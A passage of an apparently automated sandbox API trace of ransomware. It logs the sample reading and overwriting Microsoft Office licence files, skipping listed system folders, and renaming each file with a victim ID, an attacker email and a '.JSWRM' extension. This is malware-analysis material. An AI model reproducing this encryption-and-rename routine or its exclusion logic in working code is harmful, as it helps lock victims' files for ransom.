ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeccfa4bf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a4b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdVL_MAK-ppd.xrm-ms", cAlternateFileName="VIFABB~1.XRM")) returned 1 [0112.083] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0112.083] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0112.083] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0112.083] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0112.083] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.083] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.083] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.084] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.084] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.084] lstrcmpiW (lpString1="VisioStdVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0112.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0112.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241010, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0112.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0112.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0112.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0112.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.085] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6731) returned 1 [0112.085] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a40) returned 0x205850 [0112.085] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a40, lpOverlapped=0x0) returned 1 [0112.087] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.087] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a40, lpOverlapped=0x0) returned 1 [0112.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.087] CloseHandle (hObject=0x45c) returned 1 [0112.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0112.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0112.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0112.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0112.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0112.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0112.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0112.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0112.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.088] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb30867, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecb30867, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecc3b8e9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d47, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdVL_MAK-ul-oob.xrm-ms", cAlternateFileName="VI5EEC~1.XRM")) returned 1 [0112.088] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.089] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0112.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0112.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2413a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0112.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0112.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0112.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240f48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0112.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0112.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0112.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0112.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.090] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11591) returned 1 [0112.090] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0112.090] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0112.094] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.094] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0112.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.094] CloseHandle (hObject=0x45c) returned 1 [0112.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0112.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0112.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0112.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0112.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0112.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0112.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0112.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0112.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0112.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0112.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0112.095] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xece05550, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xece05550, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecec413c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdVL_MAK-ul-phn.xrm-ms", cAlternateFileName="VIACD7~1.XRM")) returned 1 [0112.095] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0112.095] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0112.095] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0112.095] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0112.095] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0112.095] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0112.096] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0112.096] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.096] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0112.096] lstrcmpiW (lpString1="VisioStdVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0112.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240ef8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0112.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241358, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0112.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0112.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0112.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.097] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19936) returned 1 [0112.097] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0112.097] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0112.100] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.100] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0112.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.100] CloseHandle (hObject=0x45c) returned 1 [0112.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0112.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0112.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0112.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0112.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.101] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.102] 